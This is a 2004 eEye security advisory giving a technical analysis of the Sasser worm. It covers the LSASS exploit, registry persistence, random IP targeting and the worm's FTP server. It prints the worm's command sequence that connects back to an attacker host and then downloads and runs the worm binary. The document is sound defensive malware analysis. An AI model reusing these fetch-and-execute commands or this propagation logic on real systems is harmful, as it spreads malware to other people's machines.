Sasser Worm Technical Analysis

Release Date:
May 1, 2004

Severity:
High

Vendor:
Microsoft

Systems Affected:
Windows 2000
Windows 2003 Server
Windows XP

Description:
The "Sasser" LSASS worm discovered April 30, 2004 is a self-propagating executable written in Microsoft Visual C. It exploits the LSA buffer overflow vulnerability reported to Microsoft by eEye and patched in the MS04-011 security bulletin released on April 13, 2004. Similar to the MSBlaster RPC DCOM worm that struck in August of last year, "Sasser" uses a public exploit for the LSA vulnerability in order to obtain a SYSTEM-level command shell on its victims.

Technical Description:
The "Sasser" LSASS worm discovered April 30, 2004 is a self-propagating executable written in Microsoft Visual C. It exploits the LSA buffer overflow vulnerability reported to Microsoft by eEye and patched in the MS04-011 security bulletin released on April 13, 2004. Similar to the MSBlaster RPC DCOM worm that struck in August of last year, "Sasser" uses a public exploit for the LSA vulnerability in order to obtain a SYSTEM-level command shell on its victims.
Once connected to the shell, the worm instructs the machine being attacked to FTP download and then execute a copy of the worm executable from a basic FTP service installed on the attacking system.

The public exploit used by the "Sasser" worm was released Thursday by "houseofdabus", and is confirmed to work against Windows 2000 Professional, Windows 2000 Server, and Windows XP Professional, in English and Russian languages. We have seen the exploit fail against Japanese-language Windows 2000, and it is possible that other languages of Windows 2000 are not susceptible to the attack as well, although an attempted attack against a vulnerable machine will cause LSASS to crash and the machine to reboot, even if it does not succeed. Because of shortcomings in the worm's use of the exploit, it should only be able to infect Windows XP and certain versions of Windows 2000 Professional.

It does not appear that the worm has any function other than propagation (and crashing vulnerable machines as an unintentional side-effect). In order to ensure that it will execute again in the event of a reboot, a new infection of "Sasser" immediately copies itself to the Windows directory (\WINDOWS or \WINNT) and installs a string value named "avserve.exe" in the registry key:

HKEY_LOCAL_MACHINE\
SOFTWARE\
Microsoft\
Windows\
CurrentVersion\
Run

This is a classic technique used by malware to run malicious executable when Windows starts. After installing itself, if another instance of the worm is already executing on the machine, the new infection will detect it by the presence of a mutex named "Jobaka3l" and immediately terminate. If this instance of the worm is the first on the victim machine, however, it starts the FTP service on TCP port 5554 and then creates 128 threads that execute in an infinite propagation loop. While propagating, the worm calls the AbortSystemShutdown API every three seconds in order to ward off crashes that may result from subsequent infection attempts.

Very simply, the propagation loop in "Sasser" just generates and attacks random IP addresses. After locating an IP address on the infected host likely to be Internet-routable (it excludes 127.0.0.1, 10.x.x.x, 172.[16-31].x.x, 192.168.x.x, and 169.254.x.x), the worm generates a partially- or wholly-random IP address to attempt to infect. On each attempt, there is a roughly 52% chance that the IP address will be generated completely randomly, a 25% chance that the first two octets will be taken from the local IP address (the last two will be random), and a 23% chance that the first octet of the local IP address will be used (the last three will be random). Random octets can fall between 0 and 254, inclusive, and are generated using a slight variation of the typical pseudorandom number generation function.

The worm attempts to connect to TCP port 445 on the system at the generated IP address, and if successful, it sends a sequence of packets in order to retrieve the host's SMB banner, which gives a hint at what version of Windows the system is running. Because the banners for Windows 2000 Professional and Windows 2000 Server are identical, the worm will always try to use a Windows 2000 Professional-specific version of the "houseofdabus" exploit against all Windows 2000 machines, significantly diminishing the chances for a successful Windows 2000 infection. Once the OS version is chosen, the "Sasser" worm sends the LSA exploit and attempts to connect to the command shell that should then be available on TCP port 9996. If successful, it issues the following commands to download and execute the worm EXE on the attacked
host:

echo off
echo open [attackerip] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [random]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[random]_up.exe
echo off
del cmd.ftp
echo on

This sequence of commands creates an FTP script that connects back to the attacking host (whose IP address is denoted with [attackerip]) on port 5554, logs in as anonymous with the password erroneously supplied as "bin" (instead of switching into binary transfer mode), and downloads the worm binary as "[random]_up.exe" (where [random] is a random number between 0 and 32767, inclusive), then executes the worm and deletes the script file. If the victim was not previously infected, this new instance of "Sasser" worm then executes and begins propagating from the attacked host.

The following is a technical outline expressing the operation of the worm in detail:

I. Main
seeds random number generator with GetTickCount()
copies worm to Windows directory as "avserve.exe"
creates a string registry value named "avserve.exe" in the registry key:

HKEY_LOCAL_MACHINE\
SOFTWARE\
Microsoft\
Windows\
CurrentVersion\Run

containing path and file name of the worm executable in the windows directory
initializes Winsock v1.1
attempts to create a mutex named "Jobaka3l", and terminates itself if the mutex already exists (meaning the machine is already infected)
starts the FTP server thread
starts 128 propagation threads
enters an infinite loop, calling AbortSystemShutdown every 3 seconds (this prevents the machine from rebooting if LSASS crashes following a successful infection, or due to subsequent exploitation attempts after an infected machine has been rebooted)
II. FTP server thread
creates a TCP/IP socket listening on port 5554
enters a "daemon" loop where incoming connections are serviced; after accepting a connection, an FTP session thread is started to handle the connection, and the server thread sleeps for 25ms and continues
III. FTP session thread
sends "220 OK\n" as the FTP banner
enters a command processing loop
receives up to 1KB from client
if connection closed gracefully, command will be interpreted as an empty string
if connection was reset, last received command will be processed (or garbage if no command was received previously)
command string is processed based on a substring search for certain supported command words
if command string contains "USER", "331 OK\n" response is sent and loop continues
if command string contains "PASS", "230 OK\n" response is sent and loop continues
if command string contains "PORT":
everything in the command string after the fourth character is copied into a 132-character buffer (this presents an exploitable stack-based buffer overflow vulnerability)
this parameter string is tokenized, using commas as the delimiter, into at most 6 fields which are converted into 32-bit integers (the first four are the octets of the IP address for the data connection, and the last two give the high and low bytes of the TCP port number)
if less than 6 fields are supplied, the other values are taken either as garbage or as the last values supplied with the "PORT" command during this session
the IP address is rendered as a string in a 40-character buffer (non-exploitable stack buffer overflow possible)
"200 OK\n" response is sent and loop continues
if command string contains "RETR":
a TCP connection is established to IP address and port specified in the last "PORT" command (or a garbage IP and port if no "PORT" command was issued)
worm executable is sent one byte at a time over data connection until end of file is reached
data connection is closed
"226 OK\n" response is sent over control connection and loop continues
if command string contains "QUIT", connection is closed but loop continues anyway
if command string does not contain a "USER", "PASS", "PORT", "RETR", or "QUIT" substring, "226 OK\n" response is sent and loop continues
after processing a command, loop will terminate if connection was closed or reset prior to attempting to receive command string
thread terminates
IV. Propagation thread
enters an infinite propagation loop
obtains list of infected host's IP addresses and selects first IP that is most likely to be Internet-routable
127.0.0.1, 10.x.x.x, 172.[16-31].x.x, 192.168.x.x, and 169.254.x.x are ignored because they are RFC 1918-reserved or otherwise special-use
the first non-matching IP address is considered to be the infected host's "external" address
if all IP addresses are non-routable, last in list is selected
chooses a partially-or entirely-random IP address to attack
52% (16/31) chance that IP address will be generated completely randomly
25% (15/31 * 16/31) chance that first two octet of infected host's IP address will be retained, and remaining two will be random
23% (15/31 * 15/31) chance that first octet will be retained, and remaining three will be random
random octets are pseudorandomly-generated numbers between 0 and 254, inclusive, produced using the formula ( ((seed = ((seed * 343FDh) + 279EC3h)) >> 16) & 7FFFh ) -- typically the addend used in this formula is 269EC3h, rather than 279EC3h
a sequence of SMB packets is sent to target over TCP/445 to retrieve SMB banner
if banner contains the substring "5.0", target host's OS is assumed to be Windows 2000 Professional
if banner contains the substring "5.1", target host's OS is assumed to be Windows XP Professional
if banner contains neither substring, target host's OS is assumed to be Windows 2000 Server; this logic should always cause Windows 2000 Server systems to be treated as running Windows 2000 Professional, however, because the two's SMB banners are indistinguishable
if no banner is retrieved, target host is skipped
sends "houseofdabus" LSASS exploit using bindshell payload to target host, twice, in order to spawn a SYSTEM command shell attached to port TCP/9996
the exploit has been observed to succeed on some languages of Windows XP where it will fail on Windows 2000 (for instance, Windows XP Professional (Japanese) is susceptible, but Windows 2000 Professional (Japanese) is not); only English and Russian were confirmed by the exploit's author
sends attack commands to target host
creates TCP/IP socket and adjusts receive timeout to 5 seconds
attempts to connect to target host on port TCP/9996; aborts attack on host if connection fails
crafts command line string by inserting attacking host's IP address and a random number (0..32767) into following string:

echo off&echo open [attackerip] 5554>>cmd.ftp&
echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&
echo get [random]_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&
ftp -s:cmd.ftp&[random]_up.exe&echo off&del cmd.ftp&echo on\n


sends command line string, one character at a time, to target host

sleeps for one second, then disconnects
sleeps for 250ms and continues propagation loop


Protection:
Retina Network Security Scanner has been updated to identify this vulnerability.

Credit:
Detailed Analysis:Yuji Ukai and Derek Soeder

Related Links:
Retina Network Security Scanner - Free 15 Day Trial http://www.eeye.com/html/Products/Retina/download.html

Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com